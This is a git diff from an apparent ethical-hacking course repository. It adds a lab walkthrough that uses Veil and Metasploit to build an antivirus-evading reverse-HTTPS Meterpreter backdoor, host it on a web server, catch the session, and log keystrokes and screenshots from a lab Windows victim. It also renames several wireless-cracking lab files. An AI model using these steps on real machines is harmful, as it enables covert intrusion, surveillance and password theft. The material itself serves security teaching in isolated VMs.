diff --git a/EthicalHacking/Labs/HackingIntoPC/create_backdoor_veil/Veil_Framework_commands.txt b/EthicalHacking/Labs/HackingIntoPC/create_backdoor_veil/Veil_Framework_commands.txt new file mode 100644 index 0000000..a9dc5e5 --- /dev/null +++ b/EthicalHacking/Labs/HackingIntoPC/create_backdoor_veil/Veil_Framework_commands.txt @@ -0,0 +1,110 @@ +Using veil-framework to Create a Backdoor + +1. Introduction +Veil is a tool designed to generate metasploit payloads (Meterpreter) that bypass common anti-virus solutions. + +Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers +and is extended over the network at runtime. +It communicates over the stager socket and provides a comprehensive client-side Ruby API. +It features command history, tab completion, channels, and more. +Metepreter was originally written by skape for Metasploit 2.x, +common extensions were merged for 3.x and is currently undergoing an overhaul for Metasploit 3.3. + +Msfconsole handles the incoming connection. Msfconsole is a part of Metasploit Framework + +Reverse http: victim acts as client. Not the attack. Backdoor connect to me (attacker) to void anti-virus detection. + +2. Check environment setting up. My Window IP: 10.0.2.8 +ipconfig + +b. in Kali (Password: toor). My Kali IP: 10.0.2.7 +ifconfig + +3. Install Veil in Kali. You need to open a Kail Terminator +mkdir opt +cd opt +git clone https://github.com/Veil-Framework/Veil.git +cd Veil +cd setup +./setup.sh (enter "y" if asks) +(close the console) + +4. Attacker set payload options using Veil +(open the console) +cd /opt/Veil +./Veil.py (you should see the Veil interface now) +list (for two tools) +use 1 (using Evasion tool) +list (list all payloads) +use 15 (go/meterpreter/rev_https.py) +set LHOST 10.0.2.7 (this IP is my attack machine, I want the payload to talk to me, e.g., reverse http) +set LPORT 8080 (http port, don't use 80, avoid anti-virus program, sometime anti-virus scans the port) +set PROCESSORS 1 (make backdoor process 1) +set SLEEP 6 +options (see changed parameters) + +5. Attacker uses Veil to generate backdoor payload (executable) +generate (you should see interface) +rev_https_8080 (backdoor name to remember easily) +(generated file name: /usr/share/veil-output/compiled/rev_https_8080.exe) +(optional: https://nodistribute.com/ to check if the backdoor will be detected) +(close the console/Terminator) + +6. Attacker load the backdoor to website (On attacker's machine/Kali) +(open a file folder) +/ (allow you to type path) +/var/www/html +(create a folder evil-files) +(control-N to open another file window) +/usr/share/veil-output/compiled/ (you will see the backdoor file) +(copy the .exe file to evil-files folder) +(open Terminator) +service apache2 start (start the website) + +7. Attacker listening incoming connection (Sever/Attacker side/Kali) +(open another Terminator or split current Terminator) +msfconsole (you should see interface) +use exploit/multi/handler +set PAYLOAD windows/meterpreter/reverse_https (I will listen to the malicouse payload/program) +show options (see all parameters for the payload) +set LHOST 10.0.2.7 (this IP is my attack machine, I am waiting, e.g., reverse http) +set LPORT 8080 (http port, don't use 80, the same setting) +show options (see all parameters for the payload) +exploit (Now attacker is listening) + +8. Victim download the backdoor payload from the website (Window machine) +(open IE) +10.0.2.7/evil-files +(click the rev_https_8080.exe and run anyway) + +9. Access to victim’s machine +(enter, you will see msg promote again) +sessions -i +sessions -i 1 +sysinfo +ps +keyscan_start (enable key logger) +(in Window VM, open facebook, type your password) +keyscan_dump (what did you see?) +keyscan_stop +screenshot (what did you see) +(you will see victim connects to the attacker) +(restore snapshot) + + + + + + + + + + + +Reference +https://www.udemy.com/learn-social-engineering-from-scratch/ +https://cyruslab.net/2012/03/07/metasploit-about-meterpreter/ +https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/ +https://www.youtube.com/watch?v=W1rCVyGwKQ4 + + diff --git a/EthicalHacking/Labs/HackingIntoPC/create_backdoor_veil/create_backdoor_Veil_lab.pptx b/EthicalHacking/Labs/HackingIntoPC/create_backdoor_veil/create_backdoor_Veil_lab.pptx new file mode 100644 index 0000000..55cdf53 Binary files /dev/null and b/EthicalHacking/Labs/HackingIntoPC/create_backdoor_veil/create_backdoor_Veil_lab.pptx differ diff --git a/EthicalHacking/Labs/WirelessPacketsSniffing/WirelessPacketsSniffing.pptx b/EthicalHacking/Labs/wirelessHacking/WirelessPacketsSniffing/WirelessPacketsSniffing.pptx similarity index 100% rename from EthicalHacking/Labs/WirelessPacketsSniffing/WirelessPacketsSniffing.pptx rename to EthicalHacking/Labs/wirelessHacking/WirelessPacketsSniffing/WirelessPacketsSniffing.pptx diff --git a/EthicalHacking/Labs/WirelessUsingPMKID/PMKID_Cracking.pptx b/EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/PMKID_Cracking.pptx similarity index 100% rename from EthicalHacking/Labs/WirelessUsingPMKID/PMKID_Cracking.pptx rename to EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/PMKID_Cracking.pptx diff --git a/EthicalHacking/Labs/WirelessUsingPMKID/commands.txt b/EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/commands.txt similarity index 100% rename from EthicalHacking/Labs/WirelessUsingPMKID/commands.txt rename to EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/commands.txt diff --git a/EthicalHacking/Labs/WirelessUsingPMKID/crack_PMKID/hash b/EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/crack_PMKID/hash similarity index 100% rename from EthicalHacking/Labs/WirelessUsingPMKID/crack_PMKID/hash rename to EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/crack_PMKID/hash diff --git a/EthicalHacking/Labs/WirelessUsingPMKID/crack_PMKID/hashtocrack b/EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/crack_PMKID/hashtocrack similarity index 100% rename from EthicalHacking/Labs/WirelessUsingPMKID/crack_PMKID/hashtocrack rename to EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/crack_PMKID/hashtocrack diff --git a/EthicalHacking/Labs/WirelessUsingPMKID/crack_PMKID/mac.txt b/EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/crack_PMKID/mac.txt similarity index 100% rename from EthicalHacking/Labs/WirelessUsingPMKID/crack_PMKID/mac.txt rename to EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/crack_PMKID/mac.txt diff --git a/EthicalHacking/Labs/WirelessUsingPMKID/crack_PMKID_neighbor/hash b/EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/crack_PMKID_neighbor/hash similarity index 100% rename from EthicalHacking/Labs/WirelessUsingPMKID/crack_PMKID_neighbor/hash rename to EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/crack_PMKID_neighbor/hash diff --git a/EthicalHacking/Labs/WirelessUsingPMKID/crack_PMKID_neighbor/hashtocrack b/EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/crack_PMKID_neighbor/hashtocrack similarity index 100% rename from EthicalHacking/Labs/WirelessUsingPMKID/crack_PMKID_neighbor/hashtocrack rename to EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/crack_PMKID_neighbor/hashtocrack diff --git a/EthicalHacking/Labs/WirelessUsingPMKID/crack_PMKID_neighbor/mac.txt b/EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/crack_PMKID_neighbor/mac.txt similarity index 100% rename from EthicalHacking/Labs/WirelessUsingPMKID/crack_PMKID_neighbor/mac.txt rename to EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/crack_PMKID_neighbor/mac.txt diff --git a/EthicalHacking/Labs/WirelessUsingPMKID/reading/How to Hack Wi-Fi_ Cracking WPA2 Passwords Using the New PMKID Hashcat Attack.pdf b/EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/reading/How to Hack Wi-Fi_ Cracking WPA2 Passwords Using the New PMKID Hashcat Attack.pdf similarity index 100% rename from EthicalHacking/Labs/WirelessUsingPMKID/reading/How to Hack Wi-Fi_ Cracking WPA2 Passwords Using the New PMKID Hashcat Attack.pdf rename to EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/reading/How to Hack Wi-Fi_ Cracking WPA2 Passwords Using the New PMKID Hashcat Attack.pdf diff --git a/EthicalHacking/Labs/WirelessUsingPMKID/reading/New attack on WPA_WPA2 using PMKID.pdf b/EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/reading/New attack on WPA_WPA2 using PMKID.pdf similarity index 100% rename from EthicalHacking/Labs/WirelessUsingPMKID/reading/New attack on WPA_WPA2 using PMKID.pdf rename to EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/reading/New attack on WPA_WPA2 using PMKID.pdf diff --git a/EthicalHacking/Labs/WirelessWEPCracking/WEP_Cracking.pptx b/EthicalHacking/Labs/wirelessHacking/WirelessWEPCracking/WEP_Cracking.pptx similarity index 100% rename from EthicalHacking/Labs/WirelessWEPCracking/WEP_Cracking.pptx rename to EthicalHacking/Labs/wirelessHacking/WirelessWEPCracking/WEP_Cracking.pptx diff --git a/EthicalHacking/Labs/WirelessWEPCracking/basic_wep-01.cap b/EthicalHacking/Labs/wirelessHacking/WirelessWEPCracking/basic_wep-01.cap similarity index 100% rename from EthicalHacking/Labs/WirelessWEPCracking/basic_wep-01.cap rename to EthicalHacking/Labs/wirelessHacking/WirelessWEPCracking/basic_wep-01.cap diff --git a/EthicalHacking/Labs/WirelessWEPCracking/basic_wep-01.csv b/EthicalHacking/Labs/wirelessHacking/WirelessWEPCracking/basic_wep-01.csv similarity index 100% rename from EthicalHacking/Labs/WirelessWEPCracking/basic_wep-01.csv rename to EthicalHacking/Labs/wirelessHacking/WirelessWEPCracking/basic_wep-01.csv diff --git a/EthicalHacking/Labs/WirelessWEPCracking/basic_wep-01.kismet.csv b/EthicalHacking/Labs/wirelessHacking/WirelessWEPCracking/basic_wep-01.kismet.csv similarity index 100% rename from EthicalHacking/Labs/WirelessWEPCracking/basic_wep-01.kismet.csv rename to EthicalHacking/Labs/wirelessHacking/WirelessWEPCracking/basic_wep-01.kismet.csv diff --git a/EthicalHacking/Labs/WirelessWEPCracking/basic_wep-01.kismet.netxml b/EthicalHacking/Labs/wirelessHacking/WirelessWEPCracking/basic_wep-01.kismet.netxml similarity index 100% rename from EthicalHacking/Labs/WirelessWEPCracking/basic_wep-01.kismet.netxml rename to EthicalHacking/Labs/wirelessHacking/WirelessWEPCracking/basic_wep-01.kismet.netxml diff --git a/EthicalHacking/Labs/WirelessWEPCracking_part2/WEP_Cracking_Force_Gene_Frames.pptx b/EthicalHacking/Labs/wirelessHacking/WirelessWEPCracking_part2/WEP_Cracking_Force_Gene_Frames.pptx similarity index 100% rename from EthicalHacking/Labs/WirelessWEPCracking_part2/WEP_Cracking_Force_Gene_Frames.pptx rename to EthicalHacking/Labs/wirelessHacking/WirelessWEPCracking_part2/WEP_Cracking_Force_Gene_Frames.pptx diff --git a/EthicalHacking/Labs/WirelessWEPCracking_part2/arp_wep-01.cap b/EthicalHacking/Labs/wirelessHacking/WirelessWEPCracking_part2/arp_wep-01.cap similarity index 100% rename from EthicalHacking/Labs/WirelessWEPCracking_part2/arp_wep-01.cap rename to EthicalHacking/Labs/wirelessHacking/WirelessWEPCracking_part2/arp_wep-01.cap diff --git a/EthicalHacking/Labs/WirelessWPA2Cracking/WEP_Cracking.pptx b/EthicalHacking/Labs/wirelessHacking/WirelessWPA2Cracking/WEP_Cracking.pptx similarity index 100% rename from EthicalHacking/Labs/WirelessWPA2Cracking/WEP_Cracking.pptx rename to EthicalHacking/Labs/wirelessHacking/WirelessWPA2Cracking/WEP_Cracking.pptx diff --git a/EthicalHacking/Labs/WirelessWPA2Cracking/mypasswordlist.txt b/EthicalHacking/Labs/wirelessHacking/WirelessWPA2Cracking/mypasswordlist.txt similarity index 100% rename from EthicalHacking/Labs/WirelessWPA2Cracking/mypasswordlist.txt rename to EthicalHacking/Labs/wirelessHacking/WirelessWPA2Cracking/mypasswordlist.txt diff --git a/EthicalHacking/Labs/WirelessWPA2Cracking/wpa_handshakes-01.cap b/EthicalHacking/Labs/wirelessHacking/WirelessWPA2Cracking/wpa_handshakes-01.cap similarity index 100% rename from EthicalHacking/Labs/WirelessWPA2Cracking/wpa_handshakes-01.cap rename to EthicalHacking/Labs/wirelessHacking/WirelessWPA2Cracking/wpa_handshakes-01.cap diff --git a/EthicalHacking/Labs/WirelessWPSCracking/WPS_Misconfig.pptx b/EthicalHacking/Labs/wirelessHacking/WirelessWPSCracking/WPS_Misconfig.pptx similarity index 100% rename from EthicalHacking/Labs/WirelessWPSCracking/WPS_Misconfig.pptx rename to EthicalHacking/Labs/wirelessHacking/WirelessWPSCracking/WPS_Misconfig.pptx diff --git a/EthicalHacking/Labs/WirelessWPSCracking/reaver b/EthicalHacking/Labs/wirelessHacking/WirelessWPSCracking/reaver similarity index 100% rename from EthicalHacking/Labs/WirelessWPSCracking/reaver rename to EthicalHacking/Labs/wirelessHacking/WirelessWPSCracking/reaver